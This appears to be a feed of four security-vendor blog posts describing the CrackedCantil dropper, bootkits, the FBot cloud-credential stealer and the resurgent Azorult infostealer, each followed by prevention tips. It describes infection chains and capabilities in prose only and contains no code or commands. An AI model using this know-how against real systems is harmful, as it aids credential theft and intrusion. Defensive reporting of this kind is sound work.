
What is CrackedCantil?

CrackedCantil is a dropper malware discovered and described by the malware analyst LambdaMamba. The name of this malware derives from two parts. “Cracked” for software cracks, is the primary spreading vector, and “Cantil” for the Cantil viper, a species of highly venomous viper, suggesting the malware’s harmful potential​​. By its nature, CrackedCantil is a loader/dropper malware that targets at delivering a lot of different malware samples, including stealers, ransomware, spyware and backdoors.

Overview of distribution ways

The main way to spread such malware is through the use of cracked software. People looking for free versions of paid software often resort to downloading “cracked” versions. These versions are often legitimate software modified to bypass licensing mechanisms. However, attackers use this demand for cracked software as a means to spread malware.

The process begins on questionable websites or forums. After downloading and running what looks like an installer, malware is installed on the user’s computer. This may be disguised as useful files or integrated into the installation executables. Once activated, the malware begins infecting the system, a process that may include several actions. Then it can install additional malware, steal data, encrypt files for ransom, and turn the infected device into part of a botnet.

CrackedCantil Delivers Droppers, Spyware and Ransomware

The tree of processes involved in the incident is quite complicated, and several infamous malware families were found to be involved. Let’s look at these families in the overall threat picture, focusing on the role of each in the symphony of cyberattacks.

PrivateLoader

PrivateLoader works as a polymorphic downloader that uses various obfuscation and packaging techniques to evade detection by antivirus programs. It is written in C++ and is often distributed with cracked software. It is also capable of downloading and executing additional malicious modules from remote control servers. Also, PrivateLoader often includes features to check the execution environment to avoid running in virtual machines or analysis environments, making it difficult for security researchers to investigate and analyze.

SmokeLoader

SmokeLoader, also known as Dofoil, is a “loader” type malware used to spread additional malware such as backdoors, keyloggers, and Trojans. It is also capable of stealing information. SmokeLoader can inject malicious code into system processes, thereby evading detection.

Lumma

Lumma is an infostealer that received quite a bit of attention over the last few months. It can extract personal and financial data from a variety of sources on infected computers, including web browsers, email clients, and cryptocurrency wallet files. Most commonly, Lumma Stealer propagates through social engineering and phishing attacks. It can also evade antivirus detection and transmit collected data to a remote command and control (C&C) server.

RedLine

RedLine Stealer is a malicious program designed to steal various types of sensitive information from infected computers. It is capable of extracting browser credentials, credit card data, e-wallet passwords, and system information. Appeared back in 2020, it has quickly become one of the most popular stealers on the malware market.

Socks5Systemz

Socks5Systemz is a malware that infects devices through PrivateLoader and Amadey. Infected devices are turned into traffic-forwarding proxies for malicious traffic, and the malware connects to its C2 server with a DGA.

STOP/Djvu Ransomware

STOP Ransomware is an encryptor characterized by adding unique extensions to encrypted files and creating ransom text files that contain instructions for the victim on how to make the payment and obtain the decryptor. Also, it encrypts files and adds its extensions to their ends – .hhaz, .cdaz, cdcc, and the like. DJVU is also a variant of the STOP ransomware that can include multiple levels of stealth, making it harder to analyze. STOP/DJVU encrypts files using AES-256 and Salsa20. It is known to collaborate with other malware, such as infostealer malware, to steal sensitive information before encryption.

How dangerous is CrackedCantil?

CrackedCantil is another player on the dropper malware market, but its unique ability to coordinate different types of malware sets it apart from the crowd. It makes a so-called “symphony of malware” where each element is carefully tuned for maximum impact. The growing popularity of CrackedCantil points to its effectiveness, in both detection evasion and malware delivery. Huge distribution through users’ desire to access paid software for free.

To avoid infection through cracked programs, the following precautions are recommended:

• Always purchase software from official vendors or directly from the developers. This not only ensures the legitimacy of your software, but also ensures that you receive all necessary security updates.
• Regularly update all installed programs and the operating system. This helps protect your system from vulnerabilities that can be exploited by malware.
• Use a reliable antivirus solution and scan your system regularly. Modern antivirus programs frequently update their databases to recognize new threats.
• Increase your and your employees’ knowledge of cyber threats and social engineering techniques. Knowing how threats spread can significantly reduce the risk of exposure.

The post CrackedCantil Dropper Delivers Numerous Malware appeared first on Gridinsoft Blog.

What is a Bootkit?

A bootkit is a sophisticated type of malware that starts and operates even before the operating system starts – during the boot process. Unlike many other malware types that target software vulnerabilities or user actions, bootkits embed themselves in the system’s boot process, making them exceptionally challenging to detect and remove.

One of the defining characteristics of a bootkit is its ability to load before the operating system (OS) itself. This gives the attacker a significant advantage, as they can intercept and manipulate the boot process, allowing them to gain control over the system even before the user logs in. Being integrated that close to the bare metal also opens the possibility of exploiting kernel-level vulnerabilities and hardware flaws.

Bootkits vs. Rootkits

While often confused, bootkits and rootkits operate at different levels of a system. Rootkits infect the OS after it loads, granting the max privileges possible to its master. At the same time bootkits are embedded in the system bootloader or even motherboard firmware. This, eventually, changes both the capabilities and the purpose of the bootkit. The two things in common between these two are both being advanced and high-severity threats.

Functionalities of Bootkits

Bootkits are versatile in their malicious functionalities. To understand and combat these malicious entities effectively, we must dissect the intricacies of their functionalities.

• Persistence. One of the primary functionalities of bootkits is their persistence. One of the primary functionalities of bootkits is their persistence. They can implant themselves in the GUID Partition Table (GPT), a more modern system architecture. This positioning allows bootkits to remain active and undetected through system reboots and even full operating system reinstalls, contributing to their prolonged presence and challenging removal from the infected system.
• Data Theft. Some bootkits are engineered to steal sensitive data from the compromised system. During the boot process, they may intercept and exfiltrate data such as login credentials, financial information, personal files, and any other valuable data they can access.
• Backdoor Access. Bootkits can create backdoors within the system, which provide unauthorized remote access to the compromised computer. Adversaries will be able to execute commands, upload additional malware, or manipulate the system as they see fit. It essentially grants them a persistent presence on the compromised device.
• Bypassing security measures. One of the key traits of bootkits is their ability to circumvent security measures. They load themselves into the system’s memory before any security software or antivirus programs have a chance to activate. As a result, they can operate undetected and unimpeded by security tools, allowing them to carry out their malicious activities without being stopped.

Can I detect and remove the bootkit?

Detecting a bootkit before it is injected into the firmware or the first partitions of the hard disk is the most effective way to prevent it from causing damage. However, detecting a bootkit infection is not an easy task, and even if it is detected, removing it can be even more challenging.

If the bootkit has been injected into the EFI partition, only a complete operating system reinstallation can remove the malicious bootkit code from the disk. However, this may not be enough if the malware managed to infect the firmware, which will result in a new system being compromised, too. In such cases, it is advisable to determine which bootkit has infected the system and use special LiveCD antivirus utilities to clean the system of any malicious code.

How to Prevent Bootkits

Preventing bootkit malware requires taking several measures to reduce the risk of infection. Here are some steps that can be taken:

1. Secure Boot and UEFI
   Secure Boot is a feature that is available in UEFI-enabled computers. Its purpose is to ensure that only trusted software is loaded during the boot process. UEFI itself is a more secure and modern technology that allows for a more firm control over the situation. This helps to prevent bootkit malware from infecting the computer. Still, recent developments have shown that the BlackLotus UEFI bootkit can bypass Secure Boot.
2. Update Your System
   Keeping your operating system and security software up-to-date can prevent bootkit malware from infecting your computer. Pay attention to firmware updates as well: although rare, UEFI/BIOS vulnerabilities exist, too, and may be exploited in different scenarios.
3. Use antivirus software
   While antivirus software can’t detect all bootkit malware, it can prevent such an infection in its early stage. Advanced control systems may also be useful for detecting the threats that integrate on such a low level.
4. Be cautious when downloading software
   It is crucial to download software from trusted sources only, especially when we talk about hardware control utilities and drivers. Those two integrate deep enough into the system to allow their exploitation for bootkit injection.
5. Use a hardware-based solution
   Hardware-based solutions, such as a Trusted Platform Module (TPM), can help prevent bootkit malware by ensuring that only trusted software is loaded during the boot process.

The post What is a Bootkit? Explanation & Protection Guide appeared first on Gridinsoft Blog.

FBot Targets AWS, Twilio and Office365

FBot is a Python-based hacking tool that was recently detected by SentinelOne analysts, particularly in its targeting of cloud services and payment platforms. FBot’s primary function is to hijack cloud, SaaS, and web services, with a secondary focus on obtaining accesses for further attacks. Among its most noteworthy features are credential harvesting capabilities, essential for initial access and potentially lucrative through the sale to other cybercriminals. FBot shares some commonalities with typical stealers, particularly in its functionalities related to credential harvesting and account hijacking.

Distinct from other infostealer malware families, FBot does not lean on the commonly used Androxgh0st code. Instead, it carves its unique path, sharing functional and design similarities with the Legion cloud infostealer. Its smaller footprint suggests private development and a targeted distribution strategy. It tops up with its extensive capabilities, including tools for hijacking AWS accounts and credential harvesting for spam attacks. Additionally, it has specialized functions to target PayPal and various SaaS accounts.

AWS Targeting

There are three functions in FBot that are designed specifically for attacking AWS accounts.
Let’s look at each of yb] in more detail:

• AWS API Key Generator
  This function of FBot creates artificial AWS API access keys. Think of it like trying to make duplicate keys for a lock, but without having the original. It randomly generates these keys hoping to guess the correct combination that will give access to an AWS account. Once succeeded, it allows unauthorized users to access the services without the manipulations visible to administrators.
• Mass AWS Checker
  This part of FBot inspects AWS account properties, permissions and services. In particular, it looks into the email configurations of AWS Simple Email Service, focusing on email sending capabilities. Moreover, it takes a step further by trying to set up a new user within the AWS account with administrative access. Such functionality may further be useful for performing massive email spam campaigns.
• AWS EC2 Checker
  One more function checks the AWS EC2 service permissions and capabilities of the compromised account. FBot checks what resources the account has available, which could be useful for someone planning to utilize these resources without authorization. Further use may be different, as spare calculation power has extremely versatile applications.

Exploiting Payment Services and SaaS Platforms

FBot’s targeting of SaaS and Payment Services is multifaceted. It includes a feature for PayPal account validation, termed “paypal_validator,” which checks if an email is linked to a PayPal account. This is executed by sending a request to a hardcoded URL, uniquely utilizing a Lithuanian fashion designer’s website for authentication. This may allow transactions hijacking or similar mischievous activities.

Additionally, FBot targets several SaaS platforms, including Sendgrid and Twilio. For Sendgrid, it has a feature to generate API keys, while for Twilio, it takes input in the form of SID and Auth Token. Similarly to AWS SES, hijacked Sendgrid accounts may further be used in impersonation email scams. Meanwhile, dumping Twilio SID/Auth Token data, malware provides its masters with quite a bit of info regarding the account – currency, balance, connected phone numbers, etc.

Web Framework Vulnerabilities

FBot’s capabilities in targeting web frameworks are particularly focused on exploiting vulnerabilities in various environments. It has a feature for validating if URLs host a Laravel environment file and extracting credentials from these files. This functionality enables FBot to potentially access sensitive configuration information. Additionally, it includes a Hidden Config Scanner, which sends HTTP GET requests to several PHP, Laravel, and AWS-related URIs, looking for stored configuration values. This scanner parses responses for keys and secrets related to a range of services, making it a potent tool for extracting valuable data from compromised web frameworks​​.

Protective Measures

To combat FBot’s threats, it’s crucial to understand its indicators of compromise. These include specific SHA1 hashes and hardcoded AWS IAM usernames and passwords used by FBot. The fight against FBot isn’t just about detection; it’s also about proactive defense.

• Employ comprehensive antivirus solutions that are regularly updated. Modern antivirus software is equipped with advanced detection capabilities to identify and neutralize malware like FBot. These tools often include real-time monitoring, heuristic analysis, and behavior-based detection, which can be particularly effective against new and evolving threats.
• FBot may use spamming tactics or exploit network vulnerabilities to gain entry. For spam protection, a robust firewall acts like a vigilant gatekeeper, monitoring and controlling incoming and outgoing network traffic based on predetermined security rules. By setting up appropriate firewall rules, you can effectively block malicious traffic and unauthorized access attempts, reducing the risk of FBot infiltrating your network.
• Organizations are advised to enable multi-factor authentication (MFA) for AWS services and set up alerts for any unusual activities, such as the creation of new user accounts or significant changes in SaaS configurations.

The post Novice FBot Stealer Targets Cloud Services appeared first on Gridinsoft Blog.

Azorult Malware Resurfaces After 2 Years

A recent research in the cyber threat landscape has brought to light concerning news about the Azorult malware. First identified in 2016, this malware gained quite an image back in the days>. Among its most noticeable campaigns is spreading together with STOP/Djvu ransomware. However, its activity was declining since early 2020, with activity curve going flat in late 2021.

Being a stealer malware from the mid-10’s, it originally carried functionality that suited the times. Azorult specializes in stealing sensitive information. It includes things such as browsing history, cookies, and login credentials. No crypto wallets, no session and 2FA tokens – those were not that valuable back in the days.

Among the key news of the resurfaced version are more sophisticated and stealthy methods, which could make it very difficult to detect. It also uses a new infection chain and uses RAM as a springboard for deploying and executing the entire payload. Researchers stumbled upon shortcut files masquerading as PDF files, eventually leading to Azorult infecting the device. As for the distribution method, experts suggest using classic means like email phishing.

What is Azorult Malware?

The Azorult malware is a spyware that can steal various data types, including credentials for applications and cryptocurrencies. It is known for its capabilities in harvesting sensitive data from infected systems. Azorult can also download and execute additional payloads, increasing its threat to compromised systems.

In its latest variant, Azorult uses process injection and “Living Off the Land” (LotL) techniques to evade detection by security tools and is primarily sold on Russian underground hacker forums. Data stolen with Azorult is also sold on Russian Dark Web marketplaces. In addition to stealing information, >the malware captured data for a service that sells ready-made virtual identities. This included as much detailed data as possible about users’ online behavior: history of website visits, information about the operating system, browser, installed plugins, etc.

In particular, researchers found that 90% of all digital footprints provided on an infamous Genesis Market were associated with Azorult. However, in February 2020, Google released a Chrome update that enforced the use of AES-256 for password encryption. This affected Azorult ability to retrieve passwords from Chrome. As the development of AZORult was discontinued in 2018, this release was concidered a “death” of AZORult, impacting Genesis’s business as well.

Azorult Uses Email Spam and LNK Files

The reviewed example of Azorult, as I mentioned above, came as an .lnk file disguised as a PDF document through the double extension tricks. A file named citibank_statement_dec_2023.lnk triggers a sequence of events that downloads and executes a JavaScript file from a remote server. The JavaScript file downloads two PowerShell scripts, one of which retrieves an executable file and initiates a new thread to execute the injected code. The loader file terminates if the user’s language code matches specific codes linked to Russia – the most probable region of its developers. The final payload is, obviously, the Azorult infostealer.

Upon execution, it generates a unique identifier for the victim and collects system information, including crypto wallets. Azorult terminates execution if certain conditions are met, such as the presence of a mutex or a file named “password.txt” on the Desktop. It also checks for specific machine names and usernames on the victim’s system. If any of the checks return true, the binary terminates. Azorult captures screenshots and targets multiple applications. The data is compressed, encrypted, and sent to a remote server.

Safety Recommendations

Since human error is mostly to blame, the most important recommendation is to beware of phishing. To elaborate, the following points will be helpful:

• Unsolicited Emails. Always be skeptical and cautious of emails from unknown sources. Especially those that request personal information or urge you to click on a link.
• Verify Email Sources. Before responding or clicking any links, verify the sender’s email address and ensure it’s legitimate. Don’t click on links in emails, especially if they seem suspicious or too good to be true.
• Educate Yourself. Stay informed about phishing methods and various phishing-based scam techniques.

The post AzorUlt Stealer Is Back In Action, Uses Email Phishing appeared first on Gridinsoft Blog.